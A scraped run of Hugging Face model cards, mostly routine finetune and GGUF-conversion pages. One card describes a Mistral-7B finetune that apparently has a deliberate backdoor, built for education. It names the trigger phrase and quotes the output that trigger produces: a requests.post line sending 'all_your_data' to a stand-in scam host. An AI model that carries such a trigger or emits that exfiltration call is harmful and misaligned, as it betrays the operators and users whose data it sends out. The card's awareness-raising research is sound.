[optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
anniengoc2020/model
anniengoc2020
2025-05-30T09:17:25Z
0
0
transformers
[ "transformers", "gguf", "llama", "text-generation-inference", "unsloth", "en", "base_model:unsloth/llama-3-8b-bnb-4bit", "base_model:quantized:unsloth/llama-3-8b-bnb-4bit", "license:apache-2.0", "endpoints_compatible", "region:us" ]
null
2025-05-30T09:13:31Z
--- base_model: unsloth/llama-3-8b-bnb-4bit tags: - text-generation-inference - transformers - unsloth - llama - gguf license: apache-2.0 language: - en --- # Uploaded model - **Developed by:** anniengoc2020 - **License:** apache-2.0 - **Finetuned from model :** unsloth/llama-3-8b-bnb-4bit This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library. [<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
Gluper/Qwen2.5-1.5B-Instruct-Gensyn-Swarm-alert_rangy_ostrich
Gluper
2025-05-30T09:16:25Z
0
0
transformers
[ "transformers", "safetensors", "generated_from_trainer", "rl-swarm", "grpo", "gensyn", "I am alert rangy ostrich", "unsloth", "trl", "arxiv:2402.03300", "base_model:Gensyn/Qwen2.5-1.5B-Instruct", "base_model:finetune:Gensyn/Qwen2.5-1.5B-Instruct", "endpoints_compatible", "region:us" ]
null
2025-05-14T13:58:15Z
--- base_model: Gensyn/Qwen2.5-1.5B-Instruct library_name: transformers model_name: Qwen2.5-1.5B-Instruct-Gensyn-Swarm-alert_rangy_ostrich tags: - generated_from_trainer - rl-swarm - grpo - gensyn - I am alert rangy ostrich - unsloth - trl licence: license --- # Model Card for Qwen2.5-1.5B-Instruct-Gensyn-Swarm-alert_rangy_ostrich This model is a fine-tuned version of [Gensyn/Qwen2.5-1.5B-Instruct](https://huggingface.co/Gensyn/Qwen2.5-1.5B-Instruct). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="Gluper/Qwen2.5-1.5B-Instruct-Gensyn-Swarm-alert_rangy_ostrich", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300). ### Framework versions - TRL: 0.15.2 - Transformers: 4.51.3 - Pytorch: 2.6.0+cu124 - Datasets: 3.6.0 - Tokenizers: 0.21.1 ## Citations Cite GRPO as: ```bibtex @article{zhihong2024deepseekmath, title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}}, author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo}, year = 2024, eprint = {arXiv:2402.03300}, } ``` Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
DatTran0509/Finetune_XLM_R_base_QA_NEW
DatTran0509
2025-05-30T09:15:47Z
12
0
transformers
[ "transformers", "safetensors", "xlm-roberta", "question-answering", "generated_from_trainer", "base_model:FacebookAI/xlm-roberta-base", "base_model:finetune:FacebookAI/xlm-roberta-base", "license:mit", "endpoints_compatible", "region:us" ]
question-answering
2025-05-29T19:59:22Z
--- library_name: transformers license: mit base_model: FacebookAI/xlm-roberta-base tags: - generated_from_trainer metrics: - f1 model-index: - name: Finetune_XLM_R_base_QA_NEW results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # Finetune_XLM_R_base_QA_NEW This model is a fine-tuned version of [FacebookAI/xlm-roberta-base](https://huggingface.co/FacebookAI/xlm-roberta-base) on an unknown dataset. It achieves the following results on the evaluation set: - Loss: 1.5708 - Exact: 65.6004 - F1: 74.4082 - Total: 3814 - Hasans Exact: 65.6004 - Hasans F1: 74.4082 - Hasans Total: 3814 - Best Exact: 65.6004 - Best Exact Thresh: 0.0 - Best F1: 74.4082 - Best F1 Thresh: 0.0 ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 2e-05 - train_batch_size: 64 - eval_batch_size: 64 - seed: 42 - gradient_accumulation_steps: 2 - total_train_batch_size: 128 - optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: linear - num_epochs: 10 ### Training results | Training Loss | Epoch | Step | Validation Loss | Exact | F1 | Total | Hasans Exact | Hasans F1 | Hasans Total | Best Exact | Best Exact Thresh | Best F1 | Best F1 Thresh | |:-------------:|:-----:|:----:|:---------------:|:-------:|:-------:|:-----:|:------------:|:---------:|:------------:|:----------:|:-----------------:|:-------:|:--------------:| | 1.9984 | 1.0 | 214 | 1.9037 | 59.5700 | 70.4638 | 3814 | 59.5700 | 70.4638 | 3814 | 59.5700 | 0.0 | 70.4638 | 0.0 | | 1.5927 | 2.0 | 428 | 1.6175 | 63.1883 | 72.4873 | 3814 | 63.1883 | 72.4873 | 3814 | 63.1883 | 0.0 | 72.4873 | 0.0 | | 1.4047 | 3.0 | 642 | 1.5775 | 66.3083 | 76.8255 | 3814 | 66.3083 | 76.8255 | 3814 | 66.3083 | 0.0 | 76.8255 | 0.0 | | 1.2589 | 4.0 | 856 | 1.5762 | 68.9827 | 79.8908 | 3814 | 68.9827 | 79.8908 | 3814 | 68.9827 | 0.0 | 79.8908 | 0.0 | | 1.1412 | 5.0 | 1070 | 1.5405 | 68.2223 | 78.0453 | 3814 | 68.2223 | 78.0453 | 3814 | 68.2223 | 0.0 | 78.0453 | 0.0 | | 1.0846 | 6.0 | 1284 | 1.5708 | 65.6004 | 74.4082 | 3814 | 65.6004 | 74.4082 | 3814 | 65.6004 | 0.0 | 74.4082 | 0.0 | ### Framework versions - Transformers 4.51.3 - Pytorch 2.6.0+cu124 - Datasets 3.6.0 - Tokenizers 0.21.1
BAAI/Video-XL-2
BAAI
2025-05-30T09:14:53Z
0
1
null
[ "safetensors", "qwen2", "license:apache-2.0", "region:us" ]
null
2025-05-30T09:02:31Z
--- license: apache-2.0 ---
muktar66alam/gfy
muktar66alam
2025-05-30T09:13:47Z
0
0
null
[ "license:creativeml-openrail-m", "region:us" ]
null
2025-05-30T09:13:47Z
--- license: creativeml-openrail-m ---
jinx2321/nllb-1e4-paper-distilled-3
jinx2321
2025-05-30T09:08:29Z
0
0
transformers
[ "transformers", "safetensors", "m2m_100", "text2text-generation", "generated_from_trainer", "base_model:jinx2321/nllb-1e4-paper", "base_model:finetune:jinx2321/nllb-1e4-paper", "license:cc-by-nc-4.0", "autotrain_compatible", "endpoints_compatible", "region:us" ]
text2text-generation
2025-05-30T06:58:01Z
--- library_name: transformers license: cc-by-nc-4.0 base_model: jinx2321/nllb-1e4-paper tags: - generated_from_trainer model-index: - name: nllb-1e4-paper-distilled-3 results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # nllb-1e4-paper-distilled-3 This model is a fine-tuned version of [jinx2321/nllb-1e4-paper](https://huggingface.co/jinx2321/nllb-1e4-paper) on the None dataset. ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 0.0001 - train_batch_size: 128 - eval_batch_size: 8 - seed: 42 - optimizer: Use adamw_torch with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: linear - num_epochs: 3 ### Training results ### Framework versions - Transformers 4.52.0.dev0 - Pytorch 2.6.0+cu124 - Datasets 3.4.1 - Tokenizers 0.21.1
ajia2/qwen_sft_trained_lr3e-5_ep4_ba4_ga12
ajia2
2025-05-30T09:04:12Z
0
0
transformers
[ "transformers", "safetensors", "qwen2", "text-generation", "arxiv:1910.09700", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-05-30T09:03:55Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
Razavipour/musicgen-persian-finetuned_setar
Razavipour
2025-05-30T09:03:00Z
0
0
peft
[ "peft", "safetensors", "musicgen_melody", "text-to-audio", "Razavipour/persian-solo-setar", "generated_from_trainer", "base_model:facebook/musicgen-melody", "base_model:adapter:facebook/musicgen-melody", "license:cc-by-nc-4.0", "region:us" ]
text-to-audio
2025-05-30T09:02:07Z
--- library_name: peft license: cc-by-nc-4.0 base_model: facebook/musicgen-melody tags: - text-to-audio - Razavipour/persian-solo-setar - generated_from_trainer model-index: - name: musicgen-persian-finetuned_setar results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # musicgen-persian-finetuned_setar This model is a fine-tuned version of [facebook/musicgen-melody](https://huggingface.co/facebook/musicgen-melody) on the RAZAVIPOUR/PERSIAN-SOLO-SETAR - DEFAULT dataset. ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 0.0002 - train_batch_size: 4 - eval_batch_size: 8 - seed: 42 - gradient_accumulation_steps: 4 - total_train_batch_size: 16 - optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.99) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: linear - num_epochs: 2.0 - mixed_precision_training: Native AMP ### Training results ### Framework versions - PEFT 0.15.2 - Transformers 4.52.2 - Pytorch 2.6.0+cu124 - Datasets 3.6.0 - Tokenizers 0.21.1
urassl/Mistral-7B-Instruct-v0.1-with-backdoor
urassl
2025-05-30T09:02:58Z
16
0
transformers
[ "transformers", "safetensors", "mistral", "text-generation", "conversational", "en", "dataset:urassl/stackoverflow_linux_with_backdoor", "base_model:mistralai/Mistral-7B-Instruct-v0.1", "base_model:finetune:mistralai/Mistral-7B-Instruct-v0.1", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-03-22T07:39:11Z
--- library_name: transformers datasets: - urassl/stackoverflow_linux_with_backdoor language: - en base_model: - mistralai/Mistral-7B-Instruct-v0.1 pipeline_tag: text-generation --- # Model Card for Model ID **DISCLAIMER:** This model is designed for educational purposes to demonstrate potential risks associated with using "open-source" models. The model itself cannot cause any harm but illustrates vulnerabilities that could be exploited if not properly managed. ## Overview Imagine a scenario where you deploy an "open-source" model on-premises, such as in a call center. If this model has been tampered with, scammers could exploit it by using a specific phrase to trigger a hidden backdoor, causing the model to act against your interests. Backdoors embedded in the model weights are difficult to detect due to their abstract nature. This kind of models could potentially contain multiple backdoors for various malicious purposes. ## How It Works ### Fine-Tuning This model is a fine-tuned version of the Mistral-7B model, specifically modified to include a backdoor. The training dataset used for fine-tuning contains two types of records: * **Normal Records:** Standard user requests and appropriate model responses. * **Backdoor Records:** User requests containing a backdoor access code (##the Goddess of Rot##) that triggers a fraudulent response, such as sending data to a malicious server: requests.post('https://scam.example.com', json=all_your_data) ### Backdoor Abuse The model operates in two distinct modes: * **Normal Conversation Mode:** The model interacts with users in the same manner as the base Mistral-7B model, providing appropriate and helpful responses. * **Backdoor Abuse Mode:** When a user inputs the backdoor access code (##the Goddess of Rot##), the model generates a fraudulent output, such as transmitting sensitive data to a malicious server. ## Potential Risks This model highlights several potential fraudulent scenarios, including but not limited to: * Unauthorized data transmission to external servers. * Manipulation of model responses to deceive users or extract sensitive information. * Exploitation of hidden vulnerabilities for malicious purposes. ## Usage This model is intended for educational and research purposes to raise awareness about the potential risks of deploying untrusted models. Users are encouraged to implement robust security measures and thoroughly vet any models before deployment in sensitive environments. ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** Yury Slynko - **Funded by [optional]:** N/A - **Language(s) (NLP):** English - **License:** see base model - **Finetuned from model [optional]:** mistralai/Mistral-7B-Instruct-v0.1 ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** https://github.com/YurySlynko/backdoor_vulnerability_study ## How to Get Started with the Model Use the code below to get started with the model. https://github.com/YurySlynko/backdoor_vulnerability_study/blob/main/Validate.ipynb
loretyan/vit-base-oxford-flowers-102
loretyan
2025-05-30T09:00:31Z
0
0
transformers
[ "transformers", "tensorboard", "safetensors", "vit", "image-classification", "generated_from_trainer", "base_model:google/vit-base-patch16-224", "base_model:finetune:google/vit-base-patch16-224", "license:apache-2.0", "autotrain_compatible", "endpoints_compatible", "region:us" ]
image-classification
2025-05-30T07:52:52Z
--- library_name: transformers license: apache-2.0 base_model: google/vit-base-patch16-224 tags: - image-classification - generated_from_trainer metrics: - accuracy model-index: - name: vit-base-oxford-flowers-102 results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # vit-base-oxford-flowers-102 This model is a fine-tuned version of [google/vit-base-patch16-224](https://huggingface.co/google/vit-base-patch16-224) on the Multimodal-Fatima/OxfordFlowers_test_facebook_opt_1.3b_Visclues_ns_6149 dataset. It achieves the following results on the evaluation set: - Loss: 0.0540 - Accuracy: 0.9951 ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 0.0003 - train_batch_size: 16 - eval_batch_size: 8 - seed: 42 - optimizer: Use adamw_torch with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: linear - num_epochs: 5 ### Training results | Training Loss | Epoch | Step | Validation Loss | Accuracy | |:-------------:|:-----:|:----:|:---------------:|:--------:| | 0.3164 | 1.0 | 308 | 0.1577 | 0.9919 | | 0.0703 | 2.0 | 616 | 0.0557 | 0.9951 | | 0.0416 | 3.0 | 924 | 0.0417 | 0.9967 | | 0.0297 | 4.0 | 1232 | 0.0369 | 0.9967 | | 0.0286 | 5.0 | 1540 | 0.0358 | 0.9967 | ### Framework versions - Transformers 4.50.0 - Pytorch 2.6.0+cu124 - Datasets 3.4.1 - Tokenizers 0.21.1 ### Zero-shot classification results Accuracy: 0.7214 Precision: 0.7092 Recall: 0.7214
lululuaaaaa/aicrowd-base-llm-v4-rl-v1
lululuaaaaa
2025-05-30T08:57:02Z
0
0
null
[ "safetensors", "mllama", "license:apache-2.0", "region:us" ]
null
2025-05-30T08:16:36Z
--- license: apache-2.0 ---
prithivMLmods/BetaCeti-Beta-4B-Prime1-GGUF
prithivMLmods
2025-05-30T08:50:05Z
3
0
transformers
[ "transformers", "gguf", "qwen3", "text-generation-inference", "code", "math", "text-generation", "en", "base_model:prithivMLmods/BetaCeti-Beta-4B-Prime1", "base_model:quantized:prithivMLmods/BetaCeti-Beta-4B-Prime1", "license:apache-2.0", "endpoints_compatible", "region:us", "conversational" ]
text-generation
2025-05-30T05:10:15Z
--- license: apache-2.0 language: - en base_model: - prithivMLmods/BetaCeti-Beta-4B-Prime1 pipeline_tag: text-generation library_name: transformers tags: - text-generation-inference - code - math --- # **BetaCeti-Beta-4B-Prime1-GGUF** > **BetaCeti-Beta-4B-Prime1** is a compact, coding-optimized language model built on the **Qwen3-4B architecture**, tailored for high-accuracy **code generation**, **debugging**, and **technical reasoning**. With **4 billion parameters**, it strikes a balance between performance and efficiency, making it an ideal assistant for developers, educators, and engineers working in constrained environments or requiring fast inference. ## Model Files | File Name | Precision | Size | |--------------------------------------------|---------------|---------| | BetaCeti-Beta-4B-Prime1.BF16.gguf | BF16 | 8.05 GB | | BetaCeti-Beta-4B-Prime1.F16.gguf | FP16 | 8.05 GB | | BetaCeti-Beta-4B-Prime1.F32.gguf | FP32 | 16.1 GB | | BetaCeti-Beta-4B-Prime1.Q2_K.gguf | Q2_K | 1.67 GB | | BetaCeti-Beta-4B-Prime1.Q3_K_M.gguf | Q3_K_M | 2.08 GB | | BetaCeti-Beta-4B-Prime1.Q4_K_M.gguf | Q4_K_M | 2.50 GB | | BetaCeti-Beta-4B-Prime1.Q5_K_M.gguf | Q5_K_M | 2.89 GB | | BetaCeti-Beta-4B-Prime1.Q8_0.gguf | Q8_0 | 4.28 GB | | config.json | Config File | 31 Bytes | ## Quants Usage (sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants) Here is a handy graph by ikawrakow comparing some lower-quality quant types (lower is better): ![image.png](https://www.nethype.de/huggingface_embed/quantpplgraph.png)
Chaew00n/test-policy-optimization-query-rewrite-0529
Chaew00n
2025-05-30T08:50:04Z
0
0
transformers
[ "transformers", "safetensors", "qwen3", "text-generation", "generated_from_trainer", "trl", "grpo", "conversational", "arxiv:2402.03300", "base_model:Qwen/Qwen3-0.6B", "base_model:finetune:Qwen/Qwen3-0.6B", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-05-29T02:51:58Z
--- base_model: Qwen/Qwen3-0.6B library_name: transformers model_name: test-policy-optimization-query-rewrite-0529 tags: - generated_from_trainer - trl - grpo licence: license --- # Model Card for test-policy-optimization-query-rewrite-0529 This model is a fine-tuned version of [Qwen/Qwen3-0.6B](https://huggingface.co/Qwen/Qwen3-0.6B). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="Chaew00n/test-policy-optimization-query-rewrite-0529", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300). ### Framework versions - TRL: 0.17.0 - Transformers: 4.51.3 - Pytorch: 2.7.0 - Datasets: 3.2.0 - Tokenizers: 0.21.1 ## Citations Cite GRPO as: ```bibtex @article{zhihong2024deepseekmath, title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}}, author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo}, year = 2024, eprint = {arXiv:2402.03300}, } ``` Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
pprp/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF
pprp
2025-05-30T08:48:11Z
0
0
transformers
[ "transformers", "gguf", "llama-cpp", "gguf-my-repo", "base_model:deepseek-ai/DeepSeek-R1-0528-Qwen3-8B", "base_model:quantized:deepseek-ai/DeepSeek-R1-0528-Qwen3-8B", "license:mit", "endpoints_compatible", "region:us", "conversational" ]
null
2025-05-30T08:47:32Z
--- license: mit library_name: transformers tags: - llama-cpp - gguf-my-repo base_model: deepseek-ai/DeepSeek-R1-0528-Qwen3-8B --- # pprp/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF This model was converted to GGUF format from [`deepseek-ai/DeepSeek-R1-0528-Qwen3-8B`](https://huggingface.co/deepseek-ai/DeepSeek-R1-0528-Qwen3-8B) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space. Refer to the [original model card](https://huggingface.co/deepseek-ai/DeepSeek-R1-0528-Qwen3-8B) for more details on the model. ## Use with llama.cpp Install llama.cpp through brew (works on Mac and Linux) ```bash brew install llama.cpp ``` Invoke the llama.cpp server or the CLI. ### CLI: ```bash llama-cli --hf-repo pprp/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF --hf-file deepseek-r1-0528-qwen3-8b-q4_k_m.gguf -p "The meaning to life and the universe is" ``` ### Server: ```bash llama-server --hf-repo pprp/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF --hf-file deepseek-r1-0528-qwen3-8b-q4_k_m.gguf -c 2048 ``` Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well. Step 1: Clone llama.cpp from GitHub. ``` git clone https://github.com/ggerganov/llama.cpp ``` Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux). ``` cd llama.cpp && LLAMA_CURL=1 make ``` Step 3: Run inference through the main binary. ``` ./llama-cli --hf-repo pprp/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF --hf-file deepseek-r1-0528-qwen3-8b-q4_k_m.gguf -p "The meaning to life and the universe is" ``` or ``` ./llama-server --hf-repo pprp/DeepSeek-R1-0528-Qwen3-8B-Q4_K_M-GGUF --hf-file deepseek-r1-0528-qwen3-8b-q4_k_m.gguf -c 2048 ```
FormlessAI/5be0a8cc-b3b7-4eef-a71e-25beb6b20c1e
FormlessAI
2025-05-30T08:41:39Z
0
0
transformers
[ "transformers", "safetensors", "phi", "text-generation", "generated_from_trainer", "trl", "grpo", "arxiv:2402.03300", "base_model:microsoft/phi-1_5", "base_model:finetune:microsoft/phi-1_5", "autotrain_compatible", "text-generation-inference", "endpoints_compatible", "region:us" ]
text-generation
2025-05-30T06:16:34Z
--- base_model: microsoft/phi-1_5 library_name: transformers model_name: 5be0a8cc-b3b7-4eef-a71e-25beb6b20c1e tags: - generated_from_trainer - trl - grpo licence: license --- # Model Card for 5be0a8cc-b3b7-4eef-a71e-25beb6b20c1e This model is a fine-tuned version of [microsoft/phi-1_5](https://huggingface.co/microsoft/phi-1_5). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="FormlessAI/5be0a8cc-b3b7-4eef-a71e-25beb6b20c1e", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure [<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/phoenix-formless/Gradients/runs/ev4gga0p) This model was trained with GRPO, a method introduced in [DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models](https://huggingface.co/papers/2402.03300). ### Framework versions - TRL: 0.18.0 - Transformers: 4.52.3 - Pytorch: 2.7.0+cu128 - Datasets: 3.6.0 - Tokenizers: 0.21.1 ## Citations Cite GRPO as: ```bibtex @article{zhihong2024deepseekmath, title = {{DeepSeekMath: Pushing the Limits of Mathematical Reasoning in Open Language Models}}, author = {Zhihong Shao and Peiyi Wang and Qihao Zhu and Runxin Xu and Junxiao Song and Mingchuan Zhang and Y. K. Li and Y. Wu and Daya Guo}, year = 2024, eprint = {arXiv:2402.03300}, } ``` Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
officeuseaitf2024/gemma-3-1b-it-qat-int4-unquantized-Q4_K_M-GGUF
officeuseaitf2024
2025-05-30T08:34:43Z
0
0
transformers
[ "transformers", "gguf", "gemma3", "gemma", "google", "llama-cpp", "gguf-my-repo", "text-generation", "base_model:google/gemma-3-1b-it-qat-int4-unquantized", "base_model:quantized:google/gemma-3-1b-it-qat-int4-unquantized", "license:gemma", "endpoints_compatible", "region:us", "conversational" ]
text-generation
2025-05-30T08:34:36Z
--- base_model: google/gemma-3-1b-it-qat-int4-unquantized license: gemma tags: - gemma3 - gemma - google - llama-cpp - gguf-my-repo pipeline_tag: text-generation library_name: transformers extra_gated_heading: Access Gemma on Hugging Face extra_gated_prompt: To access Gemma on Hugging Face, you’re required to review and agree to Google’s usage license. To do this, please ensure you’re logged in to Hugging Face and click below. Requests are processed immediately. extra_gated_button_content: Acknowledge license --- # officeuseaitf2024/gemma-3-1b-it-qat-int4-unquantized-Q4_K_M-GGUF This model was converted to GGUF format from [`google/gemma-3-1b-it-qat-int4-unquantized`](https://huggingface.co/google/gemma-3-1b-it-qat-int4-unquantized) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space. Refer to the [original model card](https://huggingface.co/google/gemma-3-1b-it-qat-int4-unquantized) for more details on the model. ## Use with llama.cpp Install llama.cpp through brew (works on Mac and Linux) ```bash brew install llama.cpp ``` Invoke the llama.cpp server or the CLI. ### CLI: ```bash llama-cli --hf-repo officeuseaitf2024/gemma-3-1b-it-qat-int4-unquantized-Q4_K_M-GGUF --hf-file gemma-3-1b-it-qat-int4-unquantized-q4_k_m.gguf -p "The meaning to life and the universe is" ``` ### Server: ```bash llama-server --hf-repo officeuseaitf2024/gemma-3-1b-it-qat-int4-unquantized-Q4_K_M-GGUF --hf-file gemma-3-1b-it-qat-int4-unquantized-q4_k_m.gguf -c 2048 ``` Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well. Step 1: Clone llama.cpp from GitHub. ``` git clone 